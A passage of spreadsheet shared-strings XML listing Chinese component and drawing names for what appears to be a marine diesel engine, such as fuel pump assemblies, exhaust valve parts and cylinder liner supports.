        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀导套装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀阀座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶撑支座</t>
    </r>
  </si>
  <si>
    <r>
      <t>V</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨损量量规</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮</t>
    </r>
  </si>
  <si>
    <r>
      <t>THERMOMETER  (100</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
      </rPr>
      <t>ﾟ</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>C)</t>
    </r>
  </si>
  <si>
    <t>Deccription</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>90°pipe bends</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件夹标题</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>线缆支架</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲拐</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油雾探测器控制器</t>
    </r>
  </si>
  <si>
    <r>
      <t>16K</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接法兰</t>
    </r>
  </si>
  <si>
    <r>
      <t>D</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型圈</t>
    </r>
  </si>
  <si>
    <r>
      <t>H-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型钢</t>
    </r>
  </si>
  <si>
    <r>
      <t>L</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表盘式温度表布置图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵手柄主体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵手柄装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测温电阻器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> YKS-400</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>承插焊法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带螺纹锥销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挡油圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向水套支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向水套装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>道门铰链</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蝶形螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端部罩壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀体机加工图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀芯导套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分割板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扶手布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扶梯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扶梯布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>浮动开关</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机布置图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机起动器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢板弹簧支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢板焊接图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖吊具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套定位块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套冷却水主管出口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套上部包扎</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供给阀支座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供给阀装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>观察盖板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>观察孔</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>观察孔盖板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管支座装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换气单元焊接图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换气单元机加工图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>黄油杯盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回转板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却系统装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞密封工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架单片焊接</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架道门布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架钢板焊接</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架钢板下料图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架机加工图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架透气管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座钢板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座焊接图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座机加工图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查阀装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减压阀本体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减压阀装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减震器盖板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减震器螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减震器气缸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线箱布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流孔</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流孔调节螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流孔油嘴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流孔装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>金属背板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器泄放连接管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气弹簧活塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气弹簧气缸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气系统线图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条导向</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条导向支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤芯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀空气弹簧支管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀空气弹簧主管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀驱动下部装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀驱动油泄放支管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀驱动装置上部装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀研磨机</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀液压管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管焊接图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管机加工图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机（带马达）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机马达起动器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器弹簧箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器阀芯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器紧固弹簧垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器调整螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器泄放管支管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器泄放管支管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器泄放连接管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器油嘴固定器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀阀座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀盖板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀活塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气进口主管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸滑油驱动装置装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸润滑螺栓布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸润滑螺栓装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驱动齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驱动装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵调节装置装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵泄放管支管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵泄放管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油齿条转换器装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油出口进口旁通管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油出口支管蒸汽伴热管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
